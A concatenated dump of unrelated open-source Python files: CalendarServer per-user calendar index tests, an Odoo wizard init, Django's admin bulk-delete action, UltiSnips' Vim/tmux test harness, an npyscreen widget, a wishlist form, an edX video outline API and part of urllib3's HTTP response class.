PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.2
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
END:VEVENT
BEGIN:X-CALENDARSERVER-PERUSER
UID:12345-67890-1.2
X-CALENDARSERVER-PERUSER-UID:user01
BEGIN:X-CALENDARSERVER-PERINSTANCE
BEGIN:VALARM
ACTION:DISPLAY
DESCRIPTION:Test
TRIGGER;RELATED=START:-PT10M
END:VALARM
TRANSP:TRANSPARENT
END:X-CALENDARSERVER-PERINSTANCE
END:X-CALENDARSERVER-PERUSER
BEGIN:X-CALENDARSERVER-PERUSER
UID:12345-67890-1.2
X-CALENDARSERVER-PERUSER-UID:user02
BEGIN:X-CALENDARSERVER-PERINSTANCE
BEGIN:VALARM
ACTION:DISPLAY
DESCRIPTION:Test
TRIGGER;RELATED=START:-PT10M
END:VALARM
END:X-CALENDARSERVER-PERINSTANCE
END:X-CALENDARSERVER-PERUSER
END:VCALENDAR
""",
"20080601T000000Z", "20080602T000000Z",
"mailto:user1@example.com",
(
(
"user01",
(('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'T'),),
),
(
"user02",
(('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'F'),),
),
(
"user03",
(('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'F'),),
),
),
),
(
"#2.1 Single per-user simple recurring component",
"2.1",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.1
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=DAILY;COUNT=10
END:VEVENT
BEGIN:X-CALENDARSERVER-PERUSER
UID:12345-67890-1.1
X-CALENDARSERVER-PERUSER-UID:user01
BEGIN:X-CALENDARSERVER-PERINSTANCE
BEGIN:VALARM
ACTION:DISPLAY
DESCRIPTION:Test
TRIGGER;RELATED=START:-PT10M
END:VALARM
TRANSP:TRANSPARENT
END:X-CALENDARSERVER-PERINSTANCE
END:X-CALENDARSERVER-PERUSER
END:VCALENDAR
""",
"20080601T000000Z", "20080603T000000Z",
"mailto:user1@example.com",
(
(
"user01",
(
('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'T'),
('N', "2008-06-02 12:00:00", "2008-06-02 13:00:00", 'B', 'T'),
),
),
(
"user02",
(
('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'F'),
('N', "2008-06-02 12:00:00", "2008-06-02 13:00:00", 'B', 'F'),
),
),
),
),
(
"#2.2 Two per-user simple recurring component",
"2.2",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.2
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=DAILY;COUNT=10
END:VEVENT
BEGIN:X-CALENDARSERVER-PERUSER
UID:12345-67890-1.2
X-CALENDARSERVER-PERUSER-UID:user01
BEGIN:X-CALENDARSERVER-PERINSTANCE
BEGIN:VALARM
ACTION:DISPLAY
DESCRIPTION:Test
TRIGGER;RELATED=START:-PT10M
END:VALARM
TRANSP:TRANSPARENT
END:X-CALENDARSERVER-PERINSTANCE
END:X-CALENDARSERVER-PERUSER
BEGIN:X-CALENDARSERVER-PERUSER
UID:12345-67890-1.2
X-CALENDARSERVER-PERUSER-UID:user02
BEGIN:X-CALENDARSERVER-PERINSTANCE
BEGIN:VALARM
ACTION:DISPLAY
DESCRIPTION:Test
TRIGGER;RELATED=START:-PT10M
END:VALARM
END:X-CALENDARSERVER-PERINSTANCE
END:X-CALENDARSERVER-PERUSER
END:VCALENDAR
""",
"20080601T000000Z", "20080603T000000Z",
"mailto:user1@example.com",
(
(
"user01",
(
('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'T'),
('N', "2008-06-02 12:00:00", "2008-06-02 13:00:00", 'B', 'T'),
),
),
(
"user02",
(
('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'F'),
('N', "2008-06-02 12:00:00", "2008-06-02 13:00:00", 'B', 'F'),
),
),
(
"user03",
(
('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'F'),
('N', "2008-06-02 12:00:00", "2008-06-02 13:00:00", 'B', 'F'),
),
),
),
),
(
"#3.1 Single per-user complex recurring component",
"3.1",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.1
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=DAILY;COUNT=10
END:VEVENT
BEGIN:VEVENT
UID:12345-67890-1.1
RECURRENCE-ID:20080602T120000Z
DTSTART:20080602T130000Z
DTEND:20080602T140000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
END:VEVENT
BEGIN:X-CALENDARSERVER-PERUSER
UID:12345-67890-1.1
X-CALENDARSERVER-PERUSER-UID:user01
BEGIN:X-CALENDARSERVER-PERINSTANCE
BEGIN:VALARM
ACTION:DISPLAY
DESCRIPTION:Test
TRIGGER;RELATED=START:-PT10M
END:VALARM
TRANSP:TRANSPARENT
END:X-CALENDARSERVER-PERINSTANCE
BEGIN:X-CALENDARSERVER-PERINSTANCE
RECURRENCE-ID:20080602T120000Z
TRANSP:OPAQUE
END:X-CALENDARSERVER-PERINSTANCE
END:X-CALENDARSERVER-PERUSER
END:VCALENDAR
""",
"20080601T000000Z", "20080604T000000Z",
"mailto:user1@example.com",
(
(
"user01",
(
('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'T'),
('N', "2008-06-02 13:00:00", "2008-06-02 14:00:00", 'B', 'F'),
('N', "2008-06-03 12:00:00", "2008-06-03 13:00:00", 'B', 'T'),
),
),
(
"user02",
(
('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'F'),
('N', "2008-06-02 13:00:00", "2008-06-02 14:00:00", 'B', 'F'),
('N', "2008-06-03 12:00:00", "2008-06-03 13:00:00", 'B', 'F'),
),
),
),
),
(
"#3.2 Two per-user complex recurring component",
"3.2",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.2
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=DAILY;COUNT=10
END:VEVENT
BEGIN:VEVENT
UID:12345-67890-1.2
RECURRENCE-ID:20080602T120000Z
DTSTART:20080602T130000Z
DTEND:20080602T140000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
END:VEVENT
BEGIN:X-CALENDARSERVER-PERUSER
UID:12345-67890-1.2
X-CALENDARSERVER-PERUSER-UID:user01
BEGIN:X-CALENDARSERVER-PERINSTANCE
BEGIN:VALARM
ACTION:DISPLAY
DESCRIPTION:Test
TRIGGER;RELATED=START:-PT10M
END:VALARM
TRANSP:TRANSPARENT
END:X-CALENDARSERVER-PERINSTANCE
BEGIN:X-CALENDARSERVER-PERINSTANCE
RECURRENCE-ID:20080602T120000Z
TRANSP:OPAQUE
END:X-CALENDARSERVER-PERINSTANCE
END:X-CALENDARSERVER-PERUSER
BEGIN:X-CALENDARSERVER-PERUSER
UID:12345-67890-1.2
X-CALENDARSERVER-PERUSER-UID:user02
BEGIN:X-CALENDARSERVER-PERINSTANCE
BEGIN:VALARM
ACTION:DISPLAY
DESCRIPTION:Test
TRIGGER;RELATED=START:-PT10M
END:VALARM
END:X-CALENDARSERVER-PERINSTANCE
BEGIN:X-CALENDARSERVER-PERINSTANCE
RECURRENCE-ID:20080603T120000Z
TRANSP:TRANSPARENT
END:X-CALENDARSERVER-PERINSTANCE
END:X-CALENDARSERVER-PERUSER
END:VCALENDAR
""",
"20080601T000000Z", "20080604T000000Z",
"mailto:user1@example.com",
(
(
"user01",
(
('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'T'),
('N', "2008-06-02 13:00:00", "2008-06-02 14:00:00", 'B', 'F'),
('N', "2008-06-03 12:00:00", "2008-06-03 13:00:00", 'B', 'T'),
),
),
(
"user02",
(
('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'F'),
('N', "2008-06-02 13:00:00", "2008-06-02 14:00:00", 'B', 'F'),
('N', "2008-06-03 12:00:00", "2008-06-03 13:00:00", 'B', 'T'),
),
),
(
"user03",
(
('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'F'),
('N', "2008-06-02 13:00:00", "2008-06-02 14:00:00", 'B', 'F'),
('N', "2008-06-03 12:00:00", "2008-06-03 13:00:00", 'B', 'F'),
),
),
),
),
)
for description, name, calendar_txt, trstart, trend, organizer, peruserinstances in data:
calendar = Component.fromString(calendar_txt)
f = open(os.path.join(self.indexDirPath.path, name), "w")
f.write(calendar_txt)
del f
self.db.addResource(name, calendar)
self.assertTrue(self.db.resourceExists(name), msg=description)
# Create fake filter element to match time-range
filter = caldavxml.Filter(
caldavxml.ComponentFilter(
caldavxml.ComponentFilter(
TimeRange(
start=trstart,
end=trend,
),
name=("VEVENT", "VFREEBUSY", "VAVAILABILITY"),
),
name="VCALENDAR",
)
)
filter = Filter(filter)
for useruid, instances in peruserinstances:
resources = yield self.db.indexedSearch(filter, useruid=useruid, fbtype=True)
index_results = set()
for _ignore_name, _ignore_uid, type, test_organizer, float, start, end, fbtype, transp in resources:
self.assertEqual(test_organizer, organizer, msg=description)
index_results.add((str(float), str(start), str(end), str(fbtype), str(transp),))
self.assertEqual(set(instances), index_results, msg="%s, user:%s" % (description, useruid,))
self.db.deleteResource(name)
def test_index_revisions(self):
data1 = """BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.1
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
END:VEVENT
END:VCALENDAR
"""
data2 = """BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-2.1
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=WEEKLY;COUNT=2
END:VEVENT
END:VCALENDAR
"""
data3 = """BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-2.3
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=WEEKLY;COUNT=2
END:VEVENT
END:VCALENDAR
"""
calendar = Component.fromString(data1)
self.db.addResource("data1.ics", calendar)
calendar = Component.fromString(data2)
self.db.addResource("data2.ics", calendar)
calendar = Component.fromString(data3)
self.db.addResource("data3.ics", calendar)
self.db.deleteResource("data3.ics")
tests = (
(0, (["data1.ics", "data2.ics", ], [], [],)),
(1, (["data2.ics", ], ["data3.ics", ], [],)),
(2, ([], ["data3.ics", ], [],)),
(3, ([], ["data3.ics", ], [],)),
(4, ([], [], [],)),
(5, ([], [], [],)),
)
for revision, results in tests:
self.assertEquals(self.db.whatchanged(revision), results, "Mismatched results for whatchanged with revision %d" % (revision,))
class MemcacheTests(SQLIndexTests):
def setUp(self):
super(MemcacheTests, self).setUp()
self.memcache = InMemoryMemcacheProtocol()
self.db.reserver = MemcachedUIDReserver(self.db, self.memcache)
def tearDown(self):
for _ignore_k, v in self.memcache._timeouts.iteritems():
if v.active():
v.cancel()
|
shingonoide/odoo
|
refs/heads/deverp_8.0
|
addons/mrp_repair/wizard/__init__.py
|
445
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import cancel_repair
import make_invoice
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
ProfessionalIT/professionalit-webiste
|
refs/heads/master
|
sdk/google_appengine/lib/django-1.3/django/contrib/admin/actions.py
|
160
|
"""
Built-in, globally-available admin actions.
"""
from django import template
from django.core.exceptions import PermissionDenied
from django.contrib.admin import helpers
from django.contrib.admin.util import get_deleted_objects, model_ngettext
from django.db import router
from django.shortcuts import render_to_response
from django.utils.encoding import force_unicode
from django.utils.translation import ugettext_lazy, ugettext as _
def delete_selected(modeladmin, request, queryset):
"""
Default action which deletes the selected objects.
This action first displays a confirmation page whichs shows all the
deleteable objects, or, if the user has no permission one of the related
childs (foreignkeys), a "permission denied" message.
Next, it delets all selected objects and redirects back to the change list.
"""
opts = modeladmin.model._meta
app_label = opts.app_label
# Check that the user has delete permission for the actual model
if not modeladmin.has_delete_permission(request):
raise PermissionDenied
using = router.db_for_write(modeladmin.model)
# Populate deletable_objects, a data structure of all related objects that
# will also be deleted.
deletable_objects, perms_needed, protected = get_deleted_objects(
queryset, opts, request.user, modeladmin.admin_site, using)
# The user has already confirmed the deletion.
# Do the deletion and return a None to display the change list view again.
if request.POST.get('post'):
if perms_needed:
raise PermissionDenied
n = queryset.count()
if n:
for obj in queryset:
obj_display = force_unicode(obj)
modeladmin.log_deletion(request, obj, obj_display)
queryset.delete()
modeladmin.message_user(request, _("Successfully deleted %(count)d %(items)s.") % {
"count": n, "items": model_ngettext(modeladmin.opts, n)
})
# Return None to display the change list page again.
return None
if len(queryset) == 1:
objects_name = force_unicode(opts.verbose_name)
else:
objects_name = force_unicode(opts.verbose_name_plural)
if perms_needed or protected:
title = _("Cannot delete %(name)s") % {"name": objects_name}
else:
title = _("Are you sure?")
context = {
"title": title,
"objects_name": objects_name,
"deletable_objects": [deletable_objects],
'queryset': queryset,
"perms_lacking": perms_needed,
"protected": protected,
"opts": opts,
"root_path": modeladmin.admin_site.root_path,
"app_label": app_label,
'action_checkbox_name': helpers.ACTION_CHECKBOX_NAME,
}
# Display the confirmation page
return render_to_response(modeladmin.delete_selected_confirmation_template or [
"admin/%s/%s/delete_selected_confirmation.html" % (app_label, opts.object_name.lower()),
"admin/%s/delete_selected_confirmation.html" % app_label,
"admin/delete_selected_confirmation.html"
], context, context_instance=template.RequestContext(request))
delete_selected.short_description = ugettext_lazy("Delete selected %(verbose_name_plural)s")
|
krisdages/ultisnips
|
refs/heads/master
|
test/vim_interface.py
|
13
|
# encoding: utf-8
import os
import re
import shutil
import subprocess
import tempfile
import textwrap
import time
from test.constant import (ARR_D, ARR_L, ARR_R, ARR_U, BS, ESC, PYTHON3,
SEQUENCES)
def wait_until_file_exists(file_path, times=None, interval=0.01):
while times is None or times:
if os.path.exists(file_path):
return True
time.sleep(interval)
if times is not None:
times -= 1
return False
def read_text_file(filename):
"""Reads the contens of a text file."""
if PYTHON3:
return open(filename, 'r', encoding='utf-8').read()
else:
return open(filename, 'r').read()
def is_process_running(pid):
"""Returns true if a process with pid is running, false otherwise."""
# from
# http://stackoverflow.com/questions/568271/how-to-check-if-there-exists-a-process-with-a-given-pid
try:
os.kill(pid, 0)
except OSError:
return False
else:
return True
def silent_call(cmd):
"""Calls 'cmd' and returns the exit value."""
return subprocess.call(cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
def create_directory(dirname):
"""Creates 'dirname' and its parents if it does not exist."""
try:
os.makedirs(dirname)
except OSError:
pass
class TempFileManager(object):
def __init__(self, name=''):
self._temp_dir = tempfile.mkdtemp(prefix='UltiSnipsTest_' + name)
def name_temp(self, file_path):
return os.path.join(self._temp_dir, file_path)
def write_temp(self, file_path, content):
abs_path = self.name_temp(file_path)
create_directory(os.path.dirname(abs_path))
if PYTHON3:
with open(abs_path, 'w', encoding='utf-8') as f:
f.write(content)
else:
with open(abs_path, 'w') as f:
f.write(content)
return abs_path
def unique_name_temp(self, suffix='', prefix=''):
file_handler, abspath = tempfile.mkstemp(
suffix, prefix, self._temp_dir)
os.close(file_handler)
os.remove(abspath)
return abspath
def clear_temp(self):
shutil.rmtree(self._temp_dir)
create_directory(self._temp_dir)
class VimInterface(TempFileManager):
def __init__(self, vim_executable, name):
TempFileManager.__init__(self, name)
self._vim_executable = vim_executable
def get_buffer_data(self):
buffer_path = self.unique_name_temp(prefix='buffer_')
self.send_to_vim(ESC + ':w! %s\n' % buffer_path)
if wait_until_file_exists(buffer_path, 50):
return read_text_file(buffer_path)[:-1]
def send_to_terminal(self, s):
"""Types 's' into the terminal."""
raise NotImplementedError()
def send_to_vim(self, s):
"""Types 's' into the vim instance under test."""
raise NotImplementedError()
def launch(self, config=[]):
"""Returns the python version in Vim as a string, e.g. '2.7'"""
pid_file = self.name_temp('vim.pid')
done_file = self.name_temp('loading_done')
if os.path.exists(done_file):
os.remove(done_file)
post_config = []
post_config.append('%s << EOF' % ('py3' if PYTHON3 else 'py'))
post_config.append('import vim, sys')
post_config.append(
"with open('%s', 'w') as pid_file: pid_file.write(vim.eval('getpid()'))" %
pid_file)
post_config.append("with open('%s', 'w') as done_file:" % done_file)
post_config.append(" done_file.write('%i.%i.%i' % sys.version_info[:3])")
post_config.append('EOF')
config_path = self.write_temp('vim_config.vim',
textwrap.dedent(os.linesep.join(config + post_config) + '\n'))
# Note the space to exclude it from shell history. Also we always set
# NVIM_LISTEN_ADDRESS, even when running vanilla Vim, because it will
# just not care.
self.send_to_terminal(""" NVIM_LISTEN_ADDRESS=/tmp/nvim %s -u %s\r\n""" % (
self._vim_executable, config_path))
wait_until_file_exists(done_file)
self._vim_pid = int(read_text_file(pid_file))
return read_text_file(done_file).strip()
def leave_with_wait(self):
self.send_to_vim(3 * ESC + ':qa!\n')
while is_process_running(self._vim_pid):
time.sleep(.2)
class VimInterfaceTmux(VimInterface):
def __init__(self, vim_executable, session):
VimInterface.__init__(self, vim_executable, 'Tmux')
self.session = session
self._check_version()
def _send(self, s):
# I did not find any documentation on what needs escaping when sending
# to tmux, but it seems like this is all that is needed for now.
s = s.replace(';', r'\;')
if PYTHON3:
s = s.encode('utf-8')
silent_call(['tmux', 'send-keys', '-t', self.session, '-l', s])
def send_to_terminal(self, s):
return self._send(s)
def send_to_vim(self, s):
return self._send(s)
def _check_version(self):
stdout, _ = subprocess.Popen(['tmux', '-V'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
if PYTHON3:
stdout = stdout.decode('utf-8')
m = re.match(r"tmux (\d+).(\d+)", stdout)
if not m or not (int(m.group(1)), int(m.group(2))) >= (1, 8):
raise RuntimeError(
'Need at least tmux 1.8, you have %s.' %
stdout.strip())
class VimInterfaceTmuxNeovim(VimInterfaceTmux):
def __init__(self, vim_executable, session):
VimInterfaceTmux.__init__(self, vim_executable, session)
self._nvim = None
def send_to_vim(self, s):
if s == ARR_L:
s = "<Left>"
elif s == ARR_R:
s = "<Right>"
elif s == ARR_U:
s = "<Up>"
elif s == ARR_D:
s = "<Down>"
elif s == BS:
s = "<bs>"
elif s == ESC:
s = "<esc>"
elif s == "<":
s = "<lt>"
self._nvim.input(s)
def launch(self, config=[]):
import neovim
rv = VimInterfaceTmux.launch(self, config)
self._nvim = neovim.attach('socket', path='/tmp/nvim')
return rv
class VimInterfaceWindows(VimInterface):
BRACES = re.compile('([}{])')
WIN_ESCAPES = ['+', '^', '%', '~', '[', ']', '<', '>', '(', ')']
WIN_REPLACES = [
(BS, '{BS}'),
(ARR_L, '{LEFT}'),
(ARR_R, '{RIGHT}'),
(ARR_U, '{UP}'),
(ARR_D, '{DOWN}'),
('\t', '{TAB}'),
('\n', '~'),
(ESC, '{ESC}'),
# On my system ` waits for a second keystroke, so `+SPACE = "`". On
# most systems, `+Space = "` ". I work around this, by sending the host
# ` as `+_+BS. Awkward, but the only way I found to get this working.
('`', '`_{BS}'),
('´', '´_{BS}'),
('{^}', '{^}_{BS}'),
]
def __init__(self):
# import windows specific modules
import win32com.client
import win32gui
self.win32gui = win32gui
self.shell = win32com.client.Dispatch('WScript.Shell')
def is_focused(self, title=None):
cur_title = self.win32gui.GetWindowText(
self.win32gui.GetForegroundWindow())
if (title or '- GVIM') in cur_title:
return True
return False
def focus(self, title=None):
if not self.shell.AppActivate(title or '- GVIM'):
raise Exception('Failed to switch to GVim window')
time.sleep(1)
def convert_keys(self, keys):
keys = self.BRACES.sub(r"{\1}", keys)
for k in self.WIN_ESCAPES:
keys = keys.replace(k, '{%s}' % k)
for f, r in self.WIN_REPLACES:
keys = keys.replace(f, r)
return keys
def send(self, keys):
keys = self.convert_keys(keys)
if not self.is_focused():
time.sleep(2)
self.focus()
if not self.is_focused():
# This is the only way I can find to stop test execution
raise KeyboardInterrupt('Failed to focus GVIM')
self.shell.SendKeys(keys)
|
C-Blu/npyscreen
|
refs/heads/master
|
build/lib/npyscreen/wgmultiselecttree.py
|
15
|
from . import wgmultilinetree as multilinetree
from . import wgcheckbox as checkbox
import weakref
class MultiSelectTree(multilinetree.SelectOneTree):
_contained_widgets = checkbox.Checkbox
def set_up_handlers(self):
super(MultiSelectTree, self).set_up_handlers()
self.handlers.update({
ord("x"): self.h_select_toggle,
curses.ascii.SP: self.h_select_toggle,
ord("X"): self.h_select,
"^U": self.h_select_none,
})
def h_select_none(self, input):
self.value = []
def h_select_toggle(self, input):
try:
working_with = weakref.proxy(self.values[self.cursor_line])
except TypeError:
working_with = self.values[self.cursor_line]
if working_with in self.value:
self.value.remove(working_with)
else:
self.value.append(working_with)
def h_set_filtered_to_selected(self, ch):
self.value = self.get_filtered_values()
def h_select_exit(self, ch):
try:
working_with = weakref.proxy(self.values[self.cursor_line])
except TypeError:
working_with = self.values[self.cursor_line]
if not working_with in self.value:
self.value.append(working_with)
if self.return_exit:
self.editing = False
self.how_exited=True
|
kimond/gobgift
|
refs/heads/master
|
gobgift/wishlists/forms.py
|
1
|
from dal import autocomplete
from django import forms
from gobgift.core.forms import CharField
from gobgift.groups.models import ListGroup
from .models import Wishlist
class WishlistForm(autocomplete.FutureModelForm):
name = CharField()
groups = forms.ModelMultipleChoiceField(
queryset=ListGroup.objects.all(),
required=False,
widget=autocomplete.ModelSelect2Multiple(
url='listgroup-autocomplete',
attrs={
'data-placeholder': 'Groups',
}
)
)
class Meta:
model = Wishlist
fields = ['owner', 'name', 'groups']
def __init__(self, user=None, *args, **kwargs):
super(WishlistForm, self).__init__(*args, **kwargs)
self.user = user
self.fields['owner'].required = False
self.fields['owner'].widget = forms.HiddenInput()
def clean(self):
cleaned_data = super(WishlistForm, self).clean()
cleaned_data['owner'] = self.user
return cleaned_data
|
jswope00/griffinx
|
refs/heads/master
|
lms/djangoapps/mobile_api/video_outlines/views.py
|
9
|
"""
Video Outlines
We only provide the listing view for a video outline, and video outlines are
only displayed at the course level. This is because it makes it a lot easier to
optimize and reason about, and it avoids having to tackle the bigger problem of
general XBlock representation in this rather specialized formatting.
"""
from functools import partial
from django.http import Http404, HttpResponse
from rest_framework import generics
from rest_framework.response import Response
from opaque_keys.edx.locator import BlockUsageLocator
from xmodule.exceptions import NotFoundError
from xmodule.modulestore.django import modulestore
from ..utils import mobile_view, mobile_course_access
from .serializers import BlockOutline, video_summary
@mobile_view()
class VideoSummaryList(generics.ListAPIView):
"""
**Use Case**
Get a list of all videos in the specified course. You can use the
video_url value to access the video file.
**Example request**:
GET /api/mobile/v0.5/video_outlines/courses/{organization}/{course_number}/{course_run}
**Response Values**
An array of videos in the course. For each video:
* section_url: The URL to the first page of the section that
contains the video in the Learning Management System.
* path: An array containing category, name, and id values specifying the
complete path the the video in the courseware hierarchy. The
following categories values are included: "chapter", "sequential",
and "vertical". The name value is the display name for that object.
* unit_url: The URL to the unit contains the video in the Learning
Management System.
* named_path: An array consisting of the display names of the
courseware objects in the path to the video.
* summary: An array of data about the video that includes:
* category: The type of component, in this case always "video".
* video_thumbnail_url: The URL to the thumbnail image for the
video, if available.
* language: The language code for the video.
* name: The display name of the video.
* video_url: The URL to the video file. Use this value to access
the video.
* duration: The length of the video, if available.
* transcripts: An array of language codes and URLs to available
video transcripts. Use the URL value to access a transcript
for the video.
* id: The unique identifier for the video.
* size: The size of the video file
"""
@mobile_course_access(depth=None)
def list(self, request, course, *args, **kwargs):
video_outline = list(
BlockOutline(
course.id,
course,
{"video": partial(video_summary, course)},
request,
)
)
return Response(video_outline)
@mobile_view()
class VideoTranscripts(generics.RetrieveAPIView):
"""
**Use Case**
Use to get a transcript for a specified video and language.
**Example request**:
GET /api/mobile/v0.5/video_outlines/transcripts/{organization}/{course_number}/{course_run}/{video ID}/{language code}
**Response Values**
An HttpResponse with an SRT file download.
"""
@mobile_course_access()
def get(self, request, course, *args, **kwargs):
block_id = kwargs['block_id']
lang = kwargs['lang']
usage_key = BlockUsageLocator(
course.id, block_type="video", block_id=block_id
)
try:
video_descriptor = modulestore().get_item(usage_key)
content, filename, mimetype = video_descriptor.get_transcript(lang=lang)
except (NotFoundError, ValueError, KeyError):
raise Http404(u"Transcript not found for {}, lang: {}".format(block_id, lang))
response = HttpResponse(content, content_type=mimetype)
response['Content-Disposition'] = 'attachment; filename="{}"'.format(filename)
return response
|
havard024/prego
|
refs/heads/master
|
crm/lib/python2.7/site-packages/pip/_vendor/requests/packages/urllib3/response.py
|
316
|
# urllib3/response.py
# Copyright 2008-2013 Andrey Petrov and contributors (see CONTRIBUTORS.txt)
#
# This module is part of urllib3 and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
import logging
import zlib
import io
from .exceptions import DecodeError
from .packages.six import string_types as basestring, binary_type
from .util import is_fp_closed
log = logging.getLogger(__name__)
class DeflateDecoder(object):
def __init__(self):
self._first_try = True
self._data = binary_type()
self._obj = zlib.decompressobj()
def __getattr__(self, name):
return getattr(self._obj, name)
def decompress(self, data):
if not self._first_try:
return self._obj.decompress(data)
self._data += data
try:
return self._obj.decompress(data)
except zlib.error:
self._first_try = False
self._obj = zlib.decompressobj(-zlib.MAX_WBITS)
try:
return self.decompress(self._data)
finally:
self._data = None
def _get_decoder(mode):
if mode == 'gzip':
return zlib.decompressobj(16 + zlib.MAX_WBITS)
return DeflateDecoder()
class HTTPResponse(io.IOBase):
"""
HTTP Response container.
Backwards-compatible to httplib's HTTPResponse but the response ``body`` is
loaded and decoded on-demand when the ``data`` property is accessed.
Extra parameters for behaviour not present in httplib.HTTPResponse:
:param preload_content:
If True, the response's body will be preloaded during construction.
:param decode_content:
If True, attempts to decode specific content-encoding's based on headers
(like 'gzip' and 'deflate') will be skipped and raw data will be used
instead.
:param original_response:
When this HTTPResponse wrapper is generated from an httplib.HTTPResponse
object, it's convenient to include the original for debug purposes. It's
otherwise unused.
"""
CONTENT_DECODERS = ['gzip', 'deflate']
REDIRECT_STATUSES = [301, 302, 303, 307, 308]
def __init__(self, body='', headers=None, status=0, version=0, reason=None,
strict=0, preload_content=True, decode_content=True,
original_response=None, pool=None, connection=None):
self.headers = headers or {}
self.status = status
self.version = version
self.reason = reason
self.strict = strict
self.decode_content = decode_content
self._decoder = None
self._body = body if body and isinstance(body, basestring) else None
self._fp = None
self._original_response = original_response
self._fp_bytes_read = 0
self._pool = pool
self._connection = connection
if hasattr(body, 'read'):
self._fp = body
if preload_content and not self._body:
self._body = self.read(decode_content=decode_content)
def get_redirect_location(self):
"""
Should we redirect and where to?
:returns: Truthy redirect location string if we got a redirect status
code and valid location. ``None`` if redirect status and no
location. ``False`` if not a redirect status code.
"""
if self.status in self.REDIRECT_STATUSES:
return self.headers.get('location')
return False
def release_conn(self):
if not self._pool or not self._connection:
return
self._pool._put_conn(self._connection)
self._connection = None
@property
def data(self):
# For backwords-compat with earlier urllib3 0.4 and earlier.
if self._body:
return self._body
if self._fp:
return self.read(cache_content=True)
def tell(self):
"""
Obtain the number of bytes pulled over the wire so far. May differ from
the amount of content returned by :meth:``HTTPResponse.read`` if bytes
are encoded on the wire (e.g, compressed).
"""
